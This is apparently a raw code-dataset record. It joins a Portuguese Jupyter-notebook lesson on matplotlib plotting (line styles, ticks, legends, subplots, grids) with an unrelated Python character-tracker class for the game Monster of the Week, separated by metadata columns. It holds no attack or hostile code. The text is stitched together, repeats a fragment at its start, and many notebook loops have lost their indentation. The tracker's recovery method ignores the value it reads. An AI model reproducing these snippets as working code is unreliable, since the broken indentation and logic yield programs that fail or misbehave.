plt.title('$y=1/2x^3 + 3x^2 - 2x - 1$');
**Exemplo 2:** gráficos de {$sen(x)$, $sen(2x)$, $sen(3x)$} e {$cos(x)$, $cos(2x)$, $cos(3x)$} dispostos em matriz 2x3.
plt.figure(figsize=(15,4))
plt.subplots_adjust(top=2.5,right=1.2) # ajusta a separação dos plots individuais
def sencosx(p):
    """Draw cell p of a 2x3 subplot grid: sin(p*x) for p<=3, cos((p-3)*x) for p>3."""
    x = np.linspace(0,2*np.pi,50)
    plt.subplot(2,3,p)
    if p <= 3:
        # First row (p = 1..3): sine curves, frequency p.
        plt.plot(x,np.sin(p*x),c=[p/4,p/5,p/6],label=f'$sen({p}x)$')
        plt.title(f'subplot(2,3,{p})');
    else:
        # Second row (p = 4..6): title uses the grid index, then p is
        # remapped to 1..3 to get the cosine frequency and color.
        plt.title(f'subplot(2,3,{p})');
        p-=3 #
        plt.plot(x,np.cos(p*x),c=[p/9,p/7,p/8],label=f'$cos({p}x)$')
    plt.legend(loc=0,fontsize=8)
    plt.xlabel('x'); plt.ylabel('y');
# plotagem
for p in range(1,7):
sencosx(p)
**Exemplo 3:** gráficos de um ponto isolado em matriz 4 x 3.
plt.figure(figsize=(15,4))
m,n = 4,3
for p in range(1,m*n+1):
star(p);
## Plots com gradeado
Podemos habilitar o gradeado usando `grid(b,which,axis)`.
Para especificar o gradeado:
- em ambos os eixos, use `b='True'` ou `b='False'`.
- maior, menor ou ambos, use `which='major'`, `which='minor'` ou `which='both'`.
- nos eixos x, y ou ambos, use `axis='x'`, `axis='y'` ou `axis='both'`.
x = np.linspace(-10,10)
plt.plot(x,x)
plt.grid(True)
plt.plot(x,x)
plt.grid(True,which='major',axis='x')
plt.plot(x,x)
plt.grid(True,which='major',axis='y')
**Exemplo:** plotagem de gradeado.
Neste exemplo, um eixo abstrato é adicionado sobre a figura (criada diretamente), com origem no ponto (0.025,0.025), largura 0.95 e altura 0.95.
ax = plt.axes([0.025, 0.025, 0.95, 0.95])
ax.set_xlim(0,4)
ax.set_ylim(0,3)
# MultipleLocator estabelece pontos de referência para divisão da grade
ax.xaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em X
ax.xaxis.set_minor_locator(plt.MultipleLocator(0.2)) # divisor maior em X
ax.yaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em Y
ax.yaxis.set_minor_locator(plt.MultipleLocator(0.1)) # divisor maior em Y
# propriedades das linhas
ax.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='x', linewidth=0.5, linestyle=':', color='b')
ax.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='y', linewidth=0.5, linestyle=':', color='g')
# para remover as ticks, adicione comentários
#ax.set_xticklabels([])
#ax.set_yticklabels([]);
plt.plot(x,x,'k')
plt.plot(x,-x+4,'k')
## Plots com preenchimento
Podemos usar `fill_between` para criar preenchimentos de área em gráficos.
x = np.linspace(-np.pi, np.pi, 60)
y = np.sin(2*x)*np.cos(x/2)
plt.fill_between(x,y,alpha=0.5);
x = np.linspace(-np.pi, np.pi, 60)
f1 = np.sin(2*x)
f2 = 0.5*np.sin(2*x)
plt.plot(x,f1,c='r');
plt.plot(x,f2,c='k');
plt.fill_between(x,f1,f2,color='g',alpha=0.2); | 41.372146 | 825 | 0.698306 | # Plotagem básica com _matplotlib_
## Visualização de dados
A visualização de dados é um campo do conhecimento bastante antigo que foi trazido à mostra muito recentemente com a expansão do "Big Data". Seu principal objetivo é representar dados e informações graficamente por meio de elementos visuais como tabelas, gráficos, mapas e infográficos. Diversas ferramentas estão disponíveis para tornar a interpretação de dados mais clara, compreensível e acessível.
No contexto da análise de dados, a visualização de dados é um componente fundamental para a criação de relatórios de negócios, painéis de instrumentos (_dashboards_) e gráficos multidimensionais que são aplicáveis às mais diversas disciplinas, tais como Economia, Ciência Política e, principalmente, todo o núcleo de ciências exatas (Matemática, Estatística e Computação).
Em seu livro _The Visual Display of Quantitative Information_, [[Edward Tufte]](https://www.edwardtufte.com/tufte/), conhecido como o guru do _design_ aplicado à visualização de dados, afirma que, a cada ano, o mundo produz algo entre 900 bilhões e 2 trilhões de imagens impressas de gráficos. Ele destaca que o _design_ de um gráfico estatístico, por exemplo, é uma matéria universal similar à Matemática e não está atrelado a características únicas de uma linguagem particular. Portanto, aprender visualização de dados para comunicar dados com eficiência é tão importante quanto aprender a Língua Portuguesa para escrever melhor.
Você pode ver uma lista sugestiva de bons blogues e livros sobre visualização de dados nas páginas de aprendizagem do software Tableau [[TableauBlogs]](https://www.tableau.com/learn/articles/best-data-visualization-blogs), [[TableauBooks]](https://www.tableau.com/learn/articles/books-about-data-visualization).
## _Data storytelling_
_Data Storytelling_ é o processo de "contar histórias através dos dados". [[Cole Knaflic]](http://www.storytellingwithdata.com), uma engenheira de dados do Google, ao perceber como a quantidade de informação produzida no mundo às vezes é muito mal lida e comunicada, escreveu dois *best-sellers* sobre este tema a fim de ajudar pessoas a comunicarem melhor seus dados e produtos quantitativos. Ela argumenta em seu livro *Storytelling with Data: A Data Visualization Guide for Business Professionals* (*Storytelling com Dados: um Guia Sobre Visualização de Dados Para Profissionais de Negócios*, na versão em português) que não somos inerentemente bons para "contar uma história" através dos dados. Cole mostra com poucas lições o que devemos aprender para atingir uma comunicação eficiente por meio da visualização de dados.
## Plotagem matemática
_Plotagem_ é o termo comumente empregado para o esboço de gráficos de funções matemáticas via computador. Plotar gráficos é uma das tarefas que você mais realizará como futuro(a) cientista ou analista de dados. Nesta aula, nós introduziremos você ao universo da plotagem de gráficos em duas dimensões e ensinar como você pode visualizar dados facilmente com a biblioteca *matplotlib*. Daremos uma visão geral principalmente sobre a plotagem de funções matemáticas utilizando *arrays* e recursos de computação vetorizada com *numpy* já aprendidos. Ao longo do curso, você aprenderá a fazer plotagens mais interessantes de cunho estatístico.
## A biblioteca *matplotlib*
*Matplotlib* é a biblioteca Python mais conhecida para plotagem 2D (bidimensional) de *arrays*. Sua filosofia é simples: criar plotagens simples com apenas alguns comandos, ou apenas um. John Hunter [[History]](https://matplotlib.org/users/history.html), falecido em 2012, foi o autor desta biblioteca. Em 2008, ele escreveu que, enquanto buscava uma solução em Python para plotagem 2D, ele gostaria de ter, entre outras coisas:
- gráficos bonitos com pronta qualidade para publicação;
- capacidade de incorporação em interfaces gráficas para desenvolvimento de aplicações;
- um código fácil de entender e de manusear.
O *matplotlib* é um código dividido em três partes:
1. A interface *pylab*: um conjunto de funções predefinidas no submódulo `matplotlib.pyplot`.
2. O *frontend*: um conjunto de classes responsáveis pela criação de figuras, textos, linhas, gráficos etc. No *frontend*, todos os elementos gráficos são objetos ainda abstratos.
3. O *backend*: um conjunto de renderizadores responsáveis por converter os gráficos para dispositivos onde eles podem ser, de fato, visualizados. A [[renderização]](https://pt.wikipedia.org/wiki/Renderização) é o produto final do processamento digital. Por exemplo, o *backend* PS é responsável pela renderização de [[PostScript]](https://www.adobe.com/br/products/postscript.html). Já o *backend* SVG constrói gráficos vetoriais escaláveis ([[Scalable Vector Graphics]](https://www.w3.org/Graphics/SVG/)).
Veja o conceito de [[Canvas]](https://en.wikipedia.org/wiki/Canvas_(GUI)).
### Sessões interativas do *matplotlib*
Sessões interativas do *matplotlib* são habilitadas através de um [[comando mágico]](https://ipython.readthedocs.io/en/stable/interactive/magics.html):
- Em consoles, use `%matplotlib`;
- No Jupyter notebook, use `%matplotlib inline`.
Lembre que na aula anterior usamos o comando mágico `%timeit` para temporizar operações.
Para usar plenamente o matplotlib nesta aula, vamos usar:
```python
%matplotlib inline
from matplotlib import pyplot as plt
```
A segunda instrução também pode ser feita como
```python
import matplotlib.pyplot as plt
```
em que `plt` é um *alias* já padronizado.
# chamada padrão
%matplotlib inline
import matplotlib.pyplot as plt
## Criação de plots simples
Vamos importar o *numpy* para usarmos os benefícios da computação vetorizada e plotar nossos primeiros exemplos.
import numpy as np
x = np.linspace(-10,10,50)
y = x
plt.plot(x,y); # reta y = x
**Exemplo:** plote o gráfico da parábola $f(x) = ax^2 + bx + c$ para valores quaisquer de $a,b,c$ no intervalo $-20 \leq x \leq 20$.
x = np.linspace(-20,20,50)
a,b,c = 2,3,4
y = a*x**2 + b*x + c # f(x)
plt.plot(x,y);
Podemos definir uma função para plotar a parábola:
def plota_parabola(a, b, c):
    """Plot the parabola f(x) = a*x**2 + b*x + c over -20 <= x <= 20.

    Args:
        a, b, c: real coefficients of the quadratic.
    """
    # The exercise asks for the interval [-20, 20]; the original code used
    # 21 as the right endpoint, which looks like a typo (the standalone
    # example above uses np.linspace(-20, 20, 50)).
    x = np.linspace(-20, 20, 50)
    y = a*x**2 + b*x + c
    plt.plot(x, y)
Agora podemos estudar o que cada coeficiente faz:
# mude o valor de a e considere b = 2, c = 1
for a in np.linspace(-2,3,10):
plota_parabola(a,2,1)
# mude o valor de b e considere a = 2, c = 1
for b in np.linspace(-2,3,20):
plota_parabola(2,b,1)
# mude o valor de c e considere a = 2, b = 1
for c in np.linspace(-2,3,10):
plota_parabola(2,1,c) # por que você não vê muitas mudanças?
# mude o valor de a, b e c
valores = np.linspace(-2,3,5)
for a in valores:
for b in valores:
for c in valores:
plota_parabola(a,b,c)
**Exemplo:** plote o gráfico da função $g(t) = a\cos(bt + \pi)$ para valores quaisquer de $a$ e $b$ no intervalo $0 \leq t \leq 2\pi$.
t = np.linspace(0,2*np.pi,50,endpoint=True) # t: ângulo
a, b = 1, 1
plt.plot(t,a*np.cos(b*t + np.pi));
b = 2
plt.plot(t,a*np.cos(b*t + np.pi));
b = 3
plt.plot(t,a*np.cos(b*t + np.pi));
As cores e marcações no gráfico são todas padronizadas. Vejamos como alterar tudo isto.
## Alteração de propriedades e estilos de linhas
Altere:
- cores com `color` ou `c`,
- espessura de linha com `linewidth` ou `lw`
- estilo de linha com `linestyle` ou `ls`
- tipo de símbolo marcador com `marker`
- largura de borda do símbolo marcador com `markeredgewidth` ou `mew`
- cor de borda do símbolo marcador com `markeredgecolor` ou `mec`
- cor de face do símbolo marcador com `markerfacecolor` ou `mfc`
- transparência com `alpha` no intervalo [0,1]
g = lambda a,b: a*np.cos(b*t + np.pi) # assume t anterior
# estude cada exemplo
# a ordem do 3o. argumento em diante pode mudar
plt.plot(t,g(1,1),color='c',linewidth=5,linestyle='-.',alpha=.3)
plt.plot(t,g(1,2),c='g',ls='-',lw='.7',marker='s',mfc='y',ms=8)
plt.plot(t,g(1,3),c='#e26d5a',ls=':', marker='d',mec='k',mew=2.0);
Cores e estilo de linha podem ser especificados de modo reduzido e em ordens distintas usando um especificador de formato.
plt.plot(t,g(1,1),'yv') # amarelo; triângulo para baixo;
plt.plot(t,g(1,2),':c+') # pontilhado; ciano; cruz;
plt.plot(t,-g(2,2),'>-.r'); # triangulo direita; traço-ponto; vermelho;
### Plotagem múltipla
O exemplo acima poderia ser feito como plotagem múltipla em 3 blocos do tipo (`x,y,'fmt')`, onde `x` e `y` são as informações dos eixos coordenados e `fmt` é uma string de formatação.
plt.plot(t,g(1,1),'yv', t,g(1,2),':c+', t,-g(2,2),'>-.r'); # 3 blocos sequenciados
Para verificar todas as opções de propriedades e estilos de linhas, veja `plt.plot?`.
### Especificação de figuras
Use `plt.figure` para criar um ambiente de figura e altere:
- a largura e altura (em polegadas) com `figsize = (largura,altura)`. O padrão é (6.4,4.8).
- a resolução (em pontos por polegadas) com `dpi`. O padrão é 100.
- a cor de fundo (*background*) com `facecolor`. O padrão é `w` (branco).
**Exemplo:** Plote os gráficos de $h_1(x) = a\sqrt{x}$ e $h_2(x) = be^{\frac{x}{c}}$ para valores de a,b,c e propriedades acima livres.
x = np.linspace(0,10,50,endpoint=True)
h1, h2 = lambda a: a*np.sqrt(x), lambda b,c: b*np.exp(x/c)
plt.figure(figsize=(8,6), dpi=200, facecolor='#e0eeee')
plt.plot(x,h1(.9),x,h2(1,9));
### Alterando limites e marcações de eixos
Altere:
- o intervalo do eixo `x` com `xlim`
- o intervalo do eixo `y` com `ylim`
- as marcações do eixo `x` com `xticks`
- as marcações do eixo `y` com `yticks`
plt.plot(x,h1(.9),x,h2(1,9)); plt.xlim(1.6,9.2); plt.ylim(1.0,2.8);
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi]); # lista de múltiplos de pi
plt.yticks([-1, 0, 1]); # 3 valores em y
### Especificando texto de marcações em eixos
Podemos alterar as marcações das `ticks` passando um texto indicativo. No caso anterior, seria melhor algo como:
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
# o par de $...$ formata os números na linguagem TeX
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi], ['$0$','$\pi/2$','$\pi$','$3/2\pi$','$2\pi$']);
plt.yticks([-1, 0, 1], ['$y = -1$', '$y = 0$', '$y = +1$']);
### Deslocamento de eixos principais
Os eixos principais podem ser movidos para outras posições arbitrárias e as bordas da área de plotagem desligadas usando `spine`.
# plotagem da função
x = np.linspace(-3,3)
plt.plot(x,x**1/2*np.sin(x)-0.5); # f(x) = √x*sen(x) - 1/2
ax = plt.gca()
ax.spines['right'].set_color('none') # remove borda direita
ax.spines['top'].set_color('none') # remove borda superior
ax.spines['bottom'].set_position(('data',0)) # desloca eixo para x = 0
ax.spines['left'].set_position(('data',0)) # desloca eixo para y = 0
ax.xaxis.set_ticks_position('top') # desloca marcações para cima
ax.yaxis.set_ticks_position('right') # desloca marcações para a direita
plt.xticks([-2,0,2]) # altera ticks de x
ax.set_xticklabels(['esq.','zero','dir.']) # altera ticklabels de x
plt.yticks([-0.4,0,0.4]) # altera ticks de y
ax.set_yticklabels(['sup.','zero','inf.']); # altera ticklabels de y
### Inserção de legendas
Para criarmos:
- uma legenda para os gráficos, usamos `legend`.
- uma legenda para o eixo x, usamos `xlabel`
- uma legenda para o eixo y, usamos `ylabel`
- um título para o gráfico, usamos `title`
**Exemplo:** plote o gráfico da reta $f_1(x) = x + 1$ e da reta $f_2(x) = 1 - x$ e adicione uma legenda com cores azul e laranja.
plt.plot(x, x + 1,'-b', label = 'y = x + 1' )
plt.plot(x, 1-x, c = [1.0,0.5,0.0], label = 'y = 1 - x'); # laranja: 100% de vermelho, 50% verde
plt.legend(loc = 'best') # 'loc=best' : melhor localização da legenda
plt.xlabel('x'); plt.ylabel('y'); plt.title('Gráfico de duas retas');
#### Localização de legendas
Use `loc=valor` para especificar onde posicionar a legenda. Use `plt.legend?` para verificar as posições disponíveis para `valor`. Vide tabela de valores `Location String` e `Location Code`.
plt.plot(np.nan,np.nan,label='upper right'); # nan : not a number
plt.legend(loc=1); # usando número
plt.plot(np.nan,np.nan,label='loc=1');
plt.legend(loc='upper right'); # usando a string correspondente
### Alteração de tamanho de fonte
Para alterar o tamanho da fonte de legendas, use `fontsize`.
plt.plot(np.nan,np.nan,label='legenda');
FSx, FSy, FSleg, FStit = 10, 20, 30, 40
plt.xlabel('Eixo x',c='b', fontsize=FSx)
plt.ylabel('Eixo y',c='g', fontsize=FSy)
plt.legend(loc='center', fontsize=FSleg);
plt.title('Título', c='c', fontsize=FStit);
### Anotações simples
Podemos incluir anotações em gráficos com a função `annotate(texto,xref,yref)`
plt.plot(np.nan,np.nan);
plt.annotate('P (0.5,0.5)',(0.5,0.5));
plt.annotate('Q (0.1,0.8)',(0.1,0.8));
**Exemplo**: gere um conjunto de 10 pontos $(x,y)$ aleatórios em que $0.2 < x,y < 0.8$ e anote-os no plano.
# gera uma lista de 10 pontos satisfazendo a condição
P = []
while len(P) != 10:
xy = np.round(np.random.rand(2),1)
test = np.all( (xy > 0.2) & (xy < 0.8) )
if test:
P.append(tuple(xy))
# plota o plano
plt.figure(figsize=(8,8))
plt.xlim(0,1)
plt.ylim(0,1)
for ponto in P:
plt.plot(ponto[0],ponto[1],'o')
plt.annotate(f'({ponto[0]},{ponto[1]})',ponto,fontsize=14)
**Problema:** o código acima tem um problema. Verifique que `len(P) = 10`, mas ele não plota os 10 pontos como gostaríamos de ver. Descubra o que está acontecendo e proponha uma solução.
## Multiplotagem e eixos
No matplotlib, podemos trabalhar com a função `subplot(m,n,p)` para criar múltiplas figuras e eixos independentes como se cada figura fosse um elemento de uma grande "matriz de figuras" de `m` linhas e `n` colunas, enquanto `p` é o índice da figura (este valor será no máximo o produto `mxn`). A função funciona da seguinte forma.
- Exemplo 1: suponha que você queira criar 3 figuras e dispô-las em uma única linha. Neste caso, `m = 1`, `n = 3` e `p` variará de 1 a 3, visto que `mxn = 3`.
- Exemplo 2: suponha que você queira criar 6 figuras e dispô-las em 2 linhas e 3 colunas. Neste caso, `m = 2`, `n = 3` e `p` variará de 1 a 6, visto que `mxn = 6`.
- Exemplo 3: suponha que você queira criar 12 figuras e dispô-las em 4 linhas e 3 colunas. Neste caso, `m = 4`, `n = 3` e `p` variará de 1 a 12, visto que `mxn = 12`.
Cada plotagem possui seu eixo independentemente da outra.
**Exemplo 1:** gráfico de 1 reta, 1 parábola e 1 polinômio cúbico lado a lado.
x = np.linspace(-5,5,20)
plt.figure(figsize=(15,4))
# aqui p = 1
plt.subplot(1,3,1) # plt.subplot(131) também é válida
plt.plot(x,2*x-1,c='r',marker='^')
plt.title('$y=2x-1$')
# aqui p = 2
plt.subplot(1,3,2) # plt.subplot(132) também é válida
plt.plot(x,3*x**2 - 2*x - 1,c='g',marker='o')
plt.title('$y=3x^2 - 2x - 1$')
# aqui p = 3
plt.subplot(1,3,3) # plt.subplot(133) também é válida
plt.plot(x,1/2*x**3 + 3*x**2 - 2*x - 1,c='b',marker='*')
plt.title('$y=1/2x^3 + 3x^2 - 2x - 1$');
**Exemplo 2:** gráficos de {$sen(x)$, $sen(2x)$, $sen(3x)$} e {$cos(x)$, $cos(2x)$, $cos(3x)$} dispostos em matriz 2x3.
plt.figure(figsize=(15,4))
plt.subplots_adjust(top=2.5,right=1.2) # ajusta a separação dos plots individuais
def sencosx(p):
    """Draw cell p of a 2x3 subplot grid: sin(p*x) for p<=3, cos((p-3)*x) for p>3."""
    x = np.linspace(0,2*np.pi,50)
    plt.subplot(2,3,p)
    if p <= 3:
        # First row (p = 1..3): sine curves, frequency p.
        plt.plot(x,np.sin(p*x),c=[p/4,p/5,p/6],label=f'$sen({p}x)$')
        plt.title(f'subplot(2,3,{p})');
    else:
        # Second row (p = 4..6): title uses the grid index, then p is
        # remapped to 1..3 to get the cosine frequency and color.
        plt.title(f'subplot(2,3,{p})');
        p-=3 #
        plt.plot(x,np.cos(p*x),c=[p/9,p/7,p/8],label=f'$cos({p}x)$')
    plt.legend(loc=0,fontsize=8)
    plt.xlabel('x'); plt.ylabel('y');
# plotagem
for p in range(1,7):
sencosx(p)
**Exemplo 3:** gráficos de um ponto isolado em matriz 4 x 3.
plt.figure(figsize=(15,4))
m,n = 4,3
def star(p):
    """Draw one randomly colored star in cell p of the m x n subplot grid.

    Relies on module-level m and n; the star grows with p (ms=p*2).
    """
    plt.subplot(m, n, p)
    plt.axis('off')  # hide the axes for a cleaner look
    center = (0.5, 0.5)
    random_color = list(np.random.rand(3))
    plt.plot(center[0], center[1], marker='*', c=random_color, ms=p*2)
    plt.annotate(f'subplot({m},{n},{p})', center, c='g', fontsize=10)
for p in range(1,m*n+1):
star(p);
## Plots com gradeado
Podemos habilitar o gradeado usando `grid(b,which,axis)`.
Para especificar o gradeado:
- em ambos os eixos, use `b='True'` ou `b='False'`.
- maior, menor ou ambos, use `which='major'`, `which='minor'` ou `which='both'`.
- nos eixos x, y ou ambos, use `axis='x'`, `axis='y'` ou `axis='both'`.
x = np.linspace(-10,10)
plt.plot(x,x)
plt.grid(True)
plt.plot(x,x)
plt.grid(True,which='major',axis='x')
plt.plot(x,x)
plt.grid(True,which='major',axis='y')
**Exemplo:** plotagem de gradeado.
Neste exemplo, um eixo abstrato é adicionado sobre a figura (criada diretamente), com origem no ponto (0.025,0.025), largura 0.95 e altura 0.95.
ax = plt.axes([0.025, 0.025, 0.95, 0.95])
ax.set_xlim(0,4)
ax.set_ylim(0,3)
# MultipleLocator estabelece pontos de referência para divisão da grade
ax.xaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em X
ax.xaxis.set_minor_locator(plt.MultipleLocator(0.2)) # divisor maior em X
ax.yaxis.set_major_locator(plt.MultipleLocator(1.0)) # divisor maior em Y
ax.yaxis.set_minor_locator(plt.MultipleLocator(0.1)) # divisor maior em Y
# propriedades das linhas
ax.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='x', linewidth=0.5, linestyle=':', color='b')
ax.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='r')
ax.grid(which='minor', axis='y', linewidth=0.5, linestyle=':', color='g')
# para remover as ticks, adicione comentários
#ax.set_xticklabels([])
#ax.set_yticklabels([]);
plt.plot(x,x,'k')
plt.plot(x,-x+4,'k')
## Plots com preenchimento
Podemos usar `fill_between` para criar preenchimentos de área em gráficos.
x = np.linspace(-np.pi, np.pi, 60)
y = np.sin(2*x)*np.cos(x/2)
plt.fill_between(x,y,alpha=0.5);
x = np.linspace(-np.pi, np.pi, 60)
f1 = np.sin(2*x)
f2 = 0.5*np.sin(2*x)
plt.plot(x,f1,c='r');
plt.plot(x,f2,c='k');
plt.fill_between(x,f1,f2,color='g',alpha=0.2); | 186 | 0 | 22 |
dbe37567374d909bfebaafcf8a547d45b740d7e5 | 10,249 | py | Python | character_tracker/character.py | mwalla/motw | b6e4eaaba46a4f7908db661c20498188f75a558c | [
"MIT"
] | null | null | null | character_tracker/character.py | mwalla/motw | b6e4eaaba46a4f7908db661c20498188f75a558c | [
"MIT"
] | null | null | null | character_tracker/character.py | mwalla/motw | b6e4eaaba46a4f7908db661c20498188f75a558c | [
"MIT"
] | null | null | null | from pprint import pprint as pp
from character_tracker.basic_moves import basic_moves
from character_tracker.roller import Roller
from character_tracker.utils import get_int_input, get_str_input
class Character(object):
"""A Monster of the Week game character.
"""
@property
@charm.setter
@property
@cool.setter
@property
@tough.setter
@property
@weird.setter
@property
@sharp.setter
if __name__ == "__main__":
pass
| 32.128527 | 99 | 0.54737 | from pprint import pprint as pp
from character_tracker.basic_moves import basic_moves
from character_tracker.roller import Roller
from character_tracker.utils import get_int_input, get_str_input
class Character(object):
    """A Monster of the Week game character.

    Holds the five ratings (charm, cool, sharp, tough, weird), luck, harm
    and experience, plus free-form inventory/history, and resolves the
    basic moves by rolling via ``self.roller`` and looking the outcome up
    in ``basic_moves``.
    """
    def __init__(self):
        # Identity / playbook data, filled in later by setup or subclasses.
        self.name = None
        self.type = None
        # Backing fields for the rating properties below. A value of None
        # marks a rejected assignment that set_skill_levels() will retry.
        self._charm = 0
        self._cool = 0
        self._sharp = 0
        self._tough = 0
        self._weird = 0
        self.luck = 7
        self.harm = 0
        # True while the character carries an unstabilized wound; every
        # call to get_move_info() then worsens self.harm by 1.
        self.unstable_injury = False
        self.experience = 0
        # Playbook dictionary (moves/haven/luck text); set externally.
        self.info = None
        self.moves = []
        self.haven = []
        self.gear = []
        self.improvements = []
        self.advanced_improvements = []
        self.history = ""
        self.skills = ["charm", "cool", "sharp", "tough", "weird"]
        # Roller class (instantiated per roll in make_a_move).
        self.roller = Roller
    # Each rating is a property whose setter checks (current + new) against
    # the allowed [-1, 3] range; an out-of-range assignment prints a warning
    # and resets the backing field to None so the caller can retry.
    # NOTE(review): the first two branches are equivalent because the
    # property just mirrors the backing field, so the elif arm can never
    # fire — confirm before simplifying.
    @property
    def charm(self):
        return self._charm
    @charm.setter
    def charm(self, value):
        if self._charm is None and self.charm is None:
            self._charm = 0
        elif self._charm is None and self.charm is not None:
            self._charm = self.charm
        if self._charm + value > 3:
            print(f"You cannot have a Charm value over 3.\n")
            self._charm = None
        elif self._charm + value < -1:
            print(f"You cannot have a Charm value under -1.\n")
            self._charm = None
        else:
            self._charm = value
    @property
    def cool(self):
        return self._cool
    @cool.setter
    def cool(self, value):
        if self._cool is None and self.cool is None:
            self._cool = 0
        elif self._cool is None and self.cool is not None:
            self._cool = self.cool
        if self._cool + value > 3:
            print(f"You cannot have a Cool value over 3.\n")
            self._cool = None
        elif self._cool + value < -1:
            print(f"You cannot have a Cool value under -1.\n")
            self._cool = None
        else:
            self._cool = value
    @property
    def tough(self):
        return self._tough
    @tough.setter
    def tough(self, value):
        if self._tough is None and self.tough is None:
            self._tough = 0
        elif self._tough is None and self.tough is not None:
            self._tough = self.tough
        if self._tough + value > 3:
            print(f"You cannot have a Tough value over 3.\n")
            self._tough = None
        elif self._tough + value < -1:
            print(f"You cannot have a Tough value under -1.\n")
            self._tough = None
        else:
            self._tough = value
    @property
    def weird(self):
        return self._weird
    @weird.setter
    def weird(self, value):
        if self._weird is None and self.weird is None:
            self._weird = 0
        elif self._weird is None and self.weird is not None:
            self._weird = self.weird
        if self._weird + value > 3:
            print(f"You cannot have a Weird value over 3.\n")
            self._weird = None
        elif self._weird + value < -1:
            print(f"You cannot have a Weird value under -1.\n")
            self._weird = None
        else:
            self._weird = value
    @property
    def sharp(self):
        return self._sharp
    @sharp.setter
    def sharp(self, value):
        if self._sharp is None and self.sharp is None:
            self._sharp = 0
        elif self._sharp is None and self.sharp is not None:
            self._sharp = self.sharp
        if self._sharp + value > 3:
            print(f"You cannot have a Sharp value over 3.\n")
            self._sharp = None
        elif self._sharp + value < -1:
            print(f"You cannot have a Sharp value under -1.\n")
            self._sharp = None
        else:
            self._sharp = value
    def get_move_info(self, score: [int, None], move: str):
        """Return the outcome message for *move* at roll total *score*.

        Side effects: an unstable injury worsens harm by 1 on every call;
        a miss (score < 7) awards 1 experience and may trigger level_up().
        Passing ``score=None`` returns the move's generic message.
        """
        if self.unstable_injury:
            self.harm += 1
            print(
                f"Damn this unstable wound! My harm is now {self.harm}!\nAnd it's getting worse!\n"
            )
        if score is None:
            return basic_moves[move]["msg"]
        if score < 7:
            self.experience += 1
            if self.experience >= 5:
                self.level_up()
                self.experience = 0
            return basic_moves[move]["miss_msg"]
        elif 7 <= score < 10:
            return basic_moves[move]["hit_msg"]
        elif 10 <= score < 12:
            return basic_moves[move]["big_hit_msg"]
        elif 12 <= score:
            return basic_moves[move]["adv_hit_msg"]
    def show_helpful_stuff(self, move: str):
        """Collect the owned playbook moves / haven options relevant to *move*.

        Returns a {title: description} dict, or a stock string when the
        character owns nothing that applies.
        """
        output = {}
        move_keys = [int(key) for key in self.info["keys"]["moves"][move]]
        for move_key in move_keys:
            if move_key in self.moves:
                title, _, description = self.info["moves"][str(move_key)].partition(":")
                output[title] = description
        if self.info["keys"]["haven"]:
            haven_keys = [int(key) for key in self.info["keys"]["haven"][move]]
            for haven_key in haven_keys:
                if haven_key in self.haven:
                    title, _, description = self.info["haven"][str(haven_key)].partition(":")
                    output[title] = description
        if not output:
            output = (
                "You don't have any Expert moves or Haven options to help with this."
            )
        return output
    def make_a_move(self, move: str, skill: str, skill_level: int) -> (str, str, dict):
        """Roll *skill* at *skill_level*; return (roll report, outcome msg, helpers)."""
        result, roller_output = self.roller(skill, skill_level).main()
        msg_output = self.get_move_info(result, move)
        help_output = self.show_helpful_stuff(move)
        return roller_output, msg_output, help_output
    def print_a_move(self, move, skill, skill_level):
        """Resolve a move via make_a_move() and pretty-print the three parts."""
        roller, msg, help_ = self.make_a_move(
            move=move, skill=skill, skill_level=skill_level
        )
        print()
        print(roller)
        print(msg)
        pp(help_, width=120)
        print()
    # Basic-move wrappers: each binds a move name to its governing rating.
    def act_under_pressure(self):
        move = "act_under_pressure"
        skill = "cool"
        self.print_a_move(move=move, skill=skill, skill_level=self.cool)
    def help_out(self):
        move = "help_out"
        skill = "cool"
        self.print_a_move(move=move, skill=skill, skill_level=self.cool)
    def investigate_a_mystery(self):
        move = "investigate"
        skill = "sharp"
        self.print_a_move(move=move, skill=skill, skill_level=self.sharp)
    def read_a_situation(self):
        move = "read_a_situation"
        skill = "sharp"
        self.print_a_move(move=move, skill=skill, skill_level=self.sharp)
    def kick_some_ass(self):
        move = "kick_some_ass"
        skill = "tough"
        self.print_a_move(move=move, skill=skill, skill_level=self.tough)
    def protect(self):
        move = "protect"
        skill = "tough"
        self.print_a_move(move=move, skill=skill, skill_level=self.tough)
    def manipulate_someone(self):
        move = "manipulate"
        skill = "charm"
        self.print_a_move(move=move, skill=skill, skill_level=self.charm)
    def use_magic(self):
        move = "magic"
        skill = "weird"
        self.print_a_move(move=move, skill=skill, skill_level=self.weird)
    def big_magic(self):
        # Big magic prints its preamble, then resolves as a normal use_magic roll.
        print(self.get_move_info(None, "big_magic"))
        return self.use_magic()
    def spend_luck(self):
        """Spend one luck point, warn when it runs out, and return the luck text."""
        self.luck -= 1
        print(f"\n{self.info['luck']['1']}")
        if self.luck == 0:
            print(f"\n{basic_moves['luck']['out_of_luck_msg']}")
        return self.get_move_info(None, "luck")
    def do_harm(self):
        """Prompt for incoming harm (and instability) and apply it."""
        print(self.get_move_info(None, "harm"))
        level = get_int_input("harm")
        unstable = get_str_input(", is the wound unstable? y/n")
        if "y" in unstable.lower():
            self.unstable_injury = True
        self.harm += level
    def recovery(self):
        """Prompt for healed harm, optionally stabilizing an unstable wound."""
        print(self.get_move_info(None, "recovery"))
        level = get_int_input("recovery")
        if self.unstable_injury:
            stable = get_str_input(", has the wound been stabilized? y/n")
            if "y" in stable.lower():
                self.unstable_injury = False
